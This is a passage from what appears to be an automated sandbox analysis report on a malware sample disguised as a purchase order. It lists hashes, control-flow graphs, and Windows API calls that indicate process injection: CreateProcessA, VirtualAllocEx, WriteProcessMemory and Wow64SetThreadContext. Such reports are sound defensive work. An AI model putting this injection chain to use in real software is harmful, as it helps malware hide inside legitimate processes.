                                                                  • Opcode Fuzzy Hash: 9b7c61ef4403c4746688d1d693eb4f33ee46549f933f1e32c53de0094d13dbfe
                                                                  • Instruction Fuzzy Hash: 01519174D0522CCBEB24CF25C984FD9B7B1BB49301F149AE6D809A3261DB345AC5CF51
                                                                  Function 066BBC58 Relevance: .1, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507450292.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66b0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3ff41052b5b4ce56f0266ec399176aa8b3207707b476b23d10e5fa5e8b9c409e
                                                                  • Instruction ID: f5790f2eff9612bfcbcb70e80fbed51e34328fd8251ae69e480aca3764900299
                                                                  • Opcode Fuzzy Hash: 3ff41052b5b4ce56f0266ec399176aa8b3207707b476b23d10e5fa5e8b9c409e
                                                                  • Instruction Fuzzy Hash: A0312BB0D05218DBEB58CFAAD8407DDFBF6AF89300F04C1AAD408AB254DB750A86CF54
                                                                  Function 066A26DC Relevance: 1.7, APIs: 1, Instructions: 207processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1409 66a26dc-66a26de 1410 66a26e0-66a26e2 1409->1410 1411 66a26e6-66a26e9 1409->1411 1412 66a26ea-66a2758 1410->1412 1413 66a26e4 1410->1413 1411->1412 1415 66a275a-66a2764 1412->1415 1416 66a2791-66a27b1 1412->1416 1413->1411 1415->1416 1417 66a2766-66a2768 1415->1417 1423 66a27ea-66a2824 1416->1423 1424 66a27b3-66a27bd 1416->1424 1419 66a276a-66a2774 1417->1419 1420 66a278b-66a278e 1417->1420 1421 66a2778-66a2787 1419->1421 1422 66a2776 1419->1422 1420->1416 1421->1421 1425 66a2789 1421->1425 1422->1421 1430 66a285d-66a28d2 CreateProcessA 1423->1430 1431 66a2826-66a2830 1423->1431 1424->1423 1426 66a27bf-66a27c1 1424->1426 1425->1420 1428 66a27c3-66a27cd 1426->1428 1429 66a27e4-66a27e7 1426->1429 1432 66a27cf 1428->1432 1433 66a27d1-66a27e0 1428->1433 1429->1423 1443 66a28db-66a2923 1430->1443 1444 66a28d4-66a28da 1430->1444 1431->1430 1434 66a2832-66a2834 1431->1434 1432->1433 1433->1433 1435 66a27e2 1433->1435 1436 66a2836-66a2840 1434->1436 1437 66a2857-66a285a 1434->1437 1435->1429 1439 66a2842 1436->1439 1440 66a2844-66a2853 1436->1440 1437->1430 1439->1440 1440->1440 1441 66a2855 1440->1441 1441->1437 1449 66a2933-66a2937 1443->1449 1450 66a2925-66a2929 1443->1450 1444->1443 1452 66a2939-66a293d 1449->1452 1453 66a2947-66a294b 1449->1453 1450->1449 1451 66a292b 1450->1451 1451->1449 1452->1453 1454 66a293f 1452->1454 1455 66a295b 1453->1455 1456 66a294d-66a2951 1453->1456 1454->1453 1458 66a295c 1455->1458 1456->1455 1457 66a2953 1456->1457 1457->1455 1458->1458
                                                                  APIs
                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 066A28C2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507404578.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: cbb615ce81e1ae64ce0790e2811334ceb63f272c6450fcc1017d8089af0be2f0
                                                                  • Instruction ID: 589fe2ba8267b63b24dc915ed67ea18fdc82e98ca659820234d4be88e065e224
                                                                  • Opcode Fuzzy Hash: cbb615ce81e1ae64ce0790e2811334ceb63f272c6450fcc1017d8089af0be2f0
                                                                  • Instruction Fuzzy Hash: 68814571D003499FDB50CFA9C8917EEBBF6BF48310F288529E855A7244D7749A85CF81
                                                                  Function 066A26E8 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1459 66a26e8-66a2758 1461 66a275a-66a2764 1459->1461 1462 66a2791-66a27b1 1459->1462 1461->1462 1463 66a2766-66a2768 1461->1463 1469 66a27ea-66a2824 1462->1469 1470 66a27b3-66a27bd 1462->1470 1465 66a276a-66a2774 1463->1465 1466 66a278b-66a278e 1463->1466 1467 66a2778-66a2787 1465->1467 1468 66a2776 1465->1468 1466->1462 1467->1467 1471 66a2789 1467->1471 1468->1467 1476 66a285d-66a28d2 CreateProcessA 1469->1476 1477 66a2826-66a2830 1469->1477 1470->1469 1472 66a27bf-66a27c1 1470->1472 1471->1466 1474 66a27c3-66a27cd 1472->1474 1475 66a27e4-66a27e7 1472->1475 1478 66a27cf 1474->1478 1479 66a27d1-66a27e0 1474->1479 1475->1469 1489 66a28db-66a2923 1476->1489 1490 66a28d4-66a28da 1476->1490 1477->1476 1480 66a2832-66a2834 1477->1480 1478->1479 1479->1479 1481 66a27e2 1479->1481 1482 66a2836-66a2840 1480->1482 1483 66a2857-66a285a 1480->1483 1481->1475 1485 66a2842 1482->1485 1486 66a2844-66a2853 1482->1486 1483->1476 1485->1486 1486->1486 1487 66a2855 1486->1487 1487->1483 1495 66a2933-66a2937 1489->1495 1496 66a2925-66a2929 1489->1496 1490->1489 1498 66a2939-66a293d 1495->1498 1499 66a2947-66a294b 1495->1499 1496->1495 1497 66a292b 1496->1497 1497->1495 1498->1499 1500 66a293f 1498->1500 1501 66a295b 1499->1501 1502 66a294d-66a2951 1499->1502 1500->1499 1504 66a295c 1501->1504 1502->1501 1503 66a2953 1502->1503 1503->1501 1504->1504
                                                                  APIs
                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 066A28C2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507404578.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: 7340020912e6863509468bf76f151eb1355ff4ea63d7cc2b796134c28c410f7a
                                                                  • Instruction ID: e2566c8dd19831ac52cc33843cfbb526f5139a2804d9aa81e7fab51f9f51ed79
                                                                  • Opcode Fuzzy Hash: 7340020912e6863509468bf76f151eb1355ff4ea63d7cc2b796134c28c410f7a
                                                                  • Instruction Fuzzy Hash: 0A813471D003499FDB50CFAAC8917EEBBF6BF48310F288529E859A7244D7749A85CF81
                                                                  Function 058375B5 Relevance: 1.6, APIs: 1, Instructions: 146fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1505 58375b5-58375ba 1506 58375c2-5837621 1505->1506 1507 58375bc-58375be 1505->1507 1509 5837623-583762d 1506->1509 1510 583765a-583767a 1506->1510 1507->1506 1509->1510 1511 583762f-5837631 1509->1511 1517 58376b3-5837715 CopyFileA 1510->1517 1518 583767c-5837686 1510->1518 1512 5837633-583763d 1511->1512 1513 5837654-5837657 1511->1513 1515 5837641-5837650 1512->1515 1516 583763f 1512->1516 1513->1510 1515->1515 1519 5837652 1515->1519 1516->1515 1528 5837717-583771d 1517->1528 1529 583771e-5837766 1517->1529 1518->1517 1520 5837688-583768a 1518->1520 1519->1513 1521 58376ad-58376b0 1520->1521 1522 583768c-5837696 1520->1522 1521->1517 1524 583769a-58376a9 1522->1524 1525 5837698 1522->1525 1524->1524 1526 58376ab 1524->1526 1525->1524 1526->1521 1528->1529 1534 5837776-583777a 1529->1534 1535 5837768-583776c 1529->1535 1537 583778a 1534->1537 1538 583777c-5837780 1534->1538 1535->1534 1536 583776e 1535->1536 1536->1534 1540 583778b 1537->1540 1538->1537 1539 5837782 1538->1539 1539->1537 1540->1540
                                                                  APIs
                                                                  • CopyFileA.KERNEL32(?,?,?), ref: 05837705
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69503248413.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5830000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: CopyFile
                                                                  • String ID:
                                                                  • API String ID: 1304948518-0
                                                                  • Opcode ID: 5182af31a4122d24b1c7fdbcd7b2b767182a814a02aa1363fb88f533e5673a45
                                                                  • Instruction ID: f356604ff837d3a2e40bdd9010338e741b2d17d6679ad1df51925bc52f05a620
                                                                  • Opcode Fuzzy Hash: 5182af31a4122d24b1c7fdbcd7b2b767182a814a02aa1363fb88f533e5673a45
                                                                  • Instruction Fuzzy Hash: 5C5169B0D007599FDB10CFA9C8967AEBBF2FF48310F148529E815E7284E7789981CB81
                                                                  Function 058375C0 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1541 58375c0-5837621 1543 5837623-583762d 1541->1543 1544 583765a-583767a 1541->1544 1543->1544 1545 583762f-5837631 1543->1545 1551 58376b3-5837715 CopyFileA 1544->1551 1552 583767c-5837686 1544->1552 1546 5837633-583763d 1545->1546 1547 5837654-5837657 1545->1547 1549 5837641-5837650 1546->1549 1550 583763f 1546->1550 1547->1544 1549->1549 1553 5837652 1549->1553 1550->1549 1562 5837717-583771d 1551->1562 1563 583771e-5837766 1551->1563 1552->1551 1554 5837688-583768a 1552->1554 1553->1547 1555 58376ad-58376b0 1554->1555 1556 583768c-5837696 1554->1556 1555->1551 1558 583769a-58376a9 1556->1558 1559 5837698 1556->1559 1558->1558 1560 58376ab 1558->1560 1559->1558 1560->1555 1562->1563 1568 5837776-583777a 1563->1568 1569 5837768-583776c 1563->1569 1571 583778a 1568->1571 1572 583777c-5837780 1568->1572 1569->1568 1570 583776e 1569->1570 1570->1568 1574 583778b 1571->1574 1572->1571 1573 5837782 1572->1573 1573->1571 1574->1574
                                                                  APIs
                                                                  • CopyFileA.KERNEL32(?,?,?), ref: 05837705
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69503248413.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5830000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: CopyFile
                                                                  • String ID:
                                                                  • API String ID: 1304948518-0
                                                                  • Opcode ID: 889f0ab72f95406790602c7c1a8e31ce9554f2c94c9e356a77b7815a1070e888
                                                                  • Instruction ID: 213c6e4735459b93bdde90c2db9e76073efc7995e436522cf5e627ba7a6610f8
                                                                  • Opcode Fuzzy Hash: 889f0ab72f95406790602c7c1a8e31ce9554f2c94c9e356a77b7815a1070e888
                                                                  • Instruction Fuzzy Hash: 745167B0D007599FDB10CFA9C8967AEBBF2FF48310F148529E815E7284E7749981CB81
                                                                  Function 064A14C0 Relevance: 1.6, Instructions: 1615COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69505824122.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_64a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0e77c3e0a2db500d93129f2b650fadc7ca04a17a910e35983a9785dedf177b44
                                                                  • Instruction ID: 5909cf9d714c4731601d18724ad2d6aa4fe9ff5055642855dfee10094d740011
                                                                  • Opcode Fuzzy Hash: 0e77c3e0a2db500d93129f2b650fadc7ca04a17a910e35983a9785dedf177b44
                                                                  • Instruction Fuzzy Hash: B2D2BF70D09388EFDB56CBA4C864BAFBFB5EF06300F15409BE541AB2A2C7745945CBA1
                                                                  Function 066A37D0 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1959 66a37d0-66a37d2 1960 66a37da-66a3826 1959->1960 1961 66a37d4-66a37d6 1959->1961 1963 66a3828-66a3834 1960->1963 1964 66a3836-66a3875 WriteProcessMemory 1960->1964 1961->1960 1963->1964 1966 66a387e-66a38ae 1964->1966 1967 66a3877-66a387d 1964->1967 1967->1966
                                                                  APIs
                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 066A3868
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507404578.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: 26f519f2892d7d575a7a17b4af9195b6ba512d664a78b4774db7c46eeaa3a24b
                                                                  • Instruction ID: 2e8fbaae7747e55b6bb45a7e2557f43318b569697f4a84609473085d45fb4c79
                                                                  • Opcode Fuzzy Hash: 26f519f2892d7d575a7a17b4af9195b6ba512d664a78b4774db7c46eeaa3a24b
                                                                  • Instruction Fuzzy Hash: 8D2114B59003499FDB50CFAAC8847EEBBF5BB48310F14842AE919A7240D7789945CB64
                                                                  Function 066A37D8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1971 66a37d8-66a3826 1973 66a3828-66a3834 1971->1973 1974 66a3836-66a3875 WriteProcessMemory 1971->1974 1973->1974 1976 66a387e-66a38ae 1974->1976 1977 66a3877-66a387d 1974->1977 1977->1976
                                                                  APIs
                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 066A3868
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507404578.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: 2f640a2d03c5d5226e55e819ea9f16c1b332f5ca5b6e43e262928a60f09563ac
                                                                  • Instruction ID: 51691fdd0540e30f64dcc865d25ad4f05863fa300fb237c05d67f938bc801935
                                                                  • Opcode Fuzzy Hash: 2f640a2d03c5d5226e55e819ea9f16c1b332f5ca5b6e43e262928a60f09563ac
                                                                  • Instruction Fuzzy Hash: 472102719003499FDB50CFAAC884BEEBBF5FB48310F10842AE919A7240D778A944CBA0
                                                                  Function 066A3EE0 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1981 66a3ee0-66a3ee2 1982 66a3eea-66a3f33 1981->1982 1983 66a3ee4-66a3ee6 1981->1983 1985 66a3f43-66a3f73 Wow64SetThreadContext 1982->1985 1986 66a3f35-66a3f41 1982->1986 1983->1982 1988 66a3f7c-66a3fac 1985->1988 1989 66a3f75-66a3f7b 1985->1989 1986->1985 1989->1988
                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 066A3F66
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507404578.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 983334009-0
                                                                  • Opcode ID: d1b17432b6e87e180faa41b4b15b3cb8c7e0b3388119c4136e86c03d863ed21a
                                                                  • Instruction ID: a4af266709cf1aca754a2af69ca9df14aaadbfe47337ccdb8c8f4ab52ef1bb35
                                                                  • Opcode Fuzzy Hash: d1b17432b6e87e180faa41b4b15b3cb8c7e0b3388119c4136e86c03d863ed21a
                                                                  • Instruction Fuzzy Hash: BC211271D103498FDB50CFAAC8857AEBBF4AB88214F14842ED559A7340D7789985CFA4
                                                                  Function 066A3EE8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 066A3F66
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507404578.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 983334009-0
                                                                  • Opcode ID: 7a8b90857612c0e8fbd13b3ccea4924506d02f4f2db18e45216d906b6730de18
                                                                  • Instruction ID: 073a0a7c9d53f3bfca4dd7ecf585234d90139f4ab5e86f8c4d7ac6b9c3eff50e
                                                                  • Opcode Fuzzy Hash: 7a8b90857612c0e8fbd13b3ccea4924506d02f4f2db18e45216d906b6730de18
                                                                  • Instruction Fuzzy Hash: FC210471D103498FDB50DFAAC8847AEBBF4AF88224F14842ED559A7340D778A985CFA4
                                                                  Function 066BD780 Relevance: 1.6, APIs: 1, Instructions: 61memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 066BD7FC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507450292.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66b0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: 48e5c677c1451e4c40c83460d421027aeca1f746e721152f0cd326b5a281d59f
                                                                  • Instruction ID: c3a319c53953043be6d34410d62365e1c0a01acb6e3319033a7f95fea18193b5
                                                                  • Opcode Fuzzy Hash: 48e5c677c1451e4c40c83460d421027aeca1f746e721152f0cd326b5a281d59f
                                                                  • Instruction Fuzzy Hash: E5210771800349DFDB10DFAAC884BEEFBF5AF88320F54842AD559A7240D778A945CFA0
                                                                  Function 06480301 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 0648037C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69505733961.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6480000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: 21e90160008b4a9c86fd3eb28c3e820774b5d9f82c0c74381ae8ea3a5c24b3f4
                                                                  • Instruction ID: 91a62148c99273d20634391e5ff3c5d734500ab8e12dd4b25a562176d5954c54
                                                                  • Opcode Fuzzy Hash: 21e90160008b4a9c86fd3eb28c3e820774b5d9f82c0c74381ae8ea3a5c24b3f4
                                                                  • Instruction Fuzzy Hash: DA2102719007499FDB10DFAAC884AAEFBF4AF89320F14842AD559A7640C7799945CFA0
                                                                  Function 066BD788 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 066BD7FC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507450292.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66b0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: 0f1a6c5ede6457b93b8311a6d0750512a998cac62f4bb93e274503845c45f875
                                                                  • Instruction ID: e551ff96f5ce3f53575e786f6a8deffd18a19906940ad9d05f04b6f5357f4557
                                                                  • Opcode Fuzzy Hash: 0f1a6c5ede6457b93b8311a6d0750512a998cac62f4bb93e274503845c45f875
                                                                  • Instruction Fuzzy Hash: 87211571C00349DFDB10DFAAC884BEEFBF4AF88320F54842AD519A7240D778A9458FA0
                                                                  Function 066A44E8 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 066A455E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507404578.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: fb0b295d6aa12173cbd08dddce193668b48e4315a03caec381f8dc699d1ec075
                                                                  • Instruction ID: b53893cec174a1e474e448a479f2195fabd84a32af10b95ea8a414936fb3ea58
                                                                  • Opcode Fuzzy Hash: fb0b295d6aa12173cbd08dddce193668b48e4315a03caec381f8dc699d1ec075
                                                                  • Instruction Fuzzy Hash: 95113372900349DFDB10CFAAD844AEEBBF5EF88320F24881AD515A7250C7799945CFA0
                                                                  Function 06480308 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 0648037C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69505733961.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6480000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: a1ba75a637e1a1e91057d842b24416c9c089856453087f8dbcad603b454ec322
                                                                  • Instruction ID: be1ef06c19c3786e6db0dbf0cc5ebf86f00aaddb76084a4fd506e9baf5957517
                                                                  • Opcode Fuzzy Hash: a1ba75a637e1a1e91057d842b24416c9c089856453087f8dbcad603b454ec322
                                                                  • Instruction Fuzzy Hash: 2211F471D007499FDB10DFAAD884AAEFBF4AF88320F14842AD519A7640C774A945CFA0
                                                                  Function 066A44F0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 066A455E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507404578.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 0f0393feb505b6b91ff1613eb775d9be5d41eb3d831ad4f70e999aac7972cc44
                                                                  • Instruction ID: 638cc5b5fa9d847f87fed5a80f41137c1fac00851afe8812329aae1a7fbdfbf8
                                                                  • Opcode Fuzzy Hash: 0f0393feb505b6b91ff1613eb775d9be5d41eb3d831ad4f70e999aac7972cc44
                                                                  • Instruction Fuzzy Hash: 24112372900349DFDB10DFAAD844BEEBBF5AF88320F24881AD519A7240C775A944CFA0
                                                                  Function 00E542B3 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69484398217.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_e50000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: hoG
                                                                  • API String ID: 0-1022838359
                                                                  • Opcode ID: 38b7c967d6134936be57c29a707d745ff72a5f9242599ac75a8efc8ace999623
                                                                  • Instruction ID: fe4d19312b1419f608301994550fb5a131dbf9f19c5be7131ac01e880a0f2b80
                                                                  • Opcode Fuzzy Hash: 38b7c967d6134936be57c29a707d745ff72a5f9242599ac75a8efc8ace999623
                                                                  • Instruction Fuzzy Hash: CDC1B0B4D06269CFEB64CF25C848BDDBBB1BB48306F1094EAD849A2295DB705EC5CF41
                                                                  Function 064E1570 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69506261282.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_64e0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: W
                                                                  • API String ID: 0-655174618
                                                                  • Opcode ID: 843529fa69428781a42cab76f0a75e62a5ad25876de707dbc2f7eb24307b89cc
                                                                  • Instruction ID: b2800ea7038965b16abff5f106d1fb5ca88ccd3dc0dc42483c0b8b301de0dbb7
                                                                  • Opcode Fuzzy Hash: 843529fa69428781a42cab76f0a75e62a5ad25876de707dbc2f7eb24307b89cc
                                                                  • Instruction Fuzzy Hash: 2A513B76600104AFCB459FA8DC14D6A7FF3FF8931071A8099E6099B376DA32DC21EB91
                                                                  Function 064E1560 Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69506261282.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_64e0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: W
                                                                  • API String ID: 0-655174618
                                                                  • Opcode ID: 11a19acc689c83ae0a2d7244f919ce8d549efaa201978a2c551848fec95db251
                                                                  • Instruction ID: 8dfe91181501708b8ab7c0d6225e6786c96006f8d080c87b544a384d0aace2a0
                                                                  • Opcode Fuzzy Hash: 11a19acc689c83ae0a2d7244f919ce8d549efaa201978a2c551848fec95db251
                                                                  • Instruction Fuzzy Hash: A9512A76600500AFCB469FA9DC05D6A7FF6FF8931471A8099F2099B376D632C821DB91
                                                                  Function 064812E8 Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(?,?,?,?), ref: 0648135B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69505733961.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6480000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: e03967df3671c7c22bc7aa7131c9a9aa593facedaa2d3af616c5f0b07e1fb1e1
                                                                  • Instruction ID: 0dfefcd0c72ff685518c39c77c9b20fcdec26d529681af2c36f9791774804f86
                                                                  • Opcode Fuzzy Hash: e03967df3671c7c22bc7aa7131c9a9aa593facedaa2d3af616c5f0b07e1fb1e1
                                                                  • Instruction Fuzzy Hash: F7114471900749CFEB10DFAAC844BEFBFF5AF89320F14881AD569A7640C7759985CBA0
                                                                  Function 064812F0 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(?,?,?,?), ref: 0648135B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69505733961.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6480000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
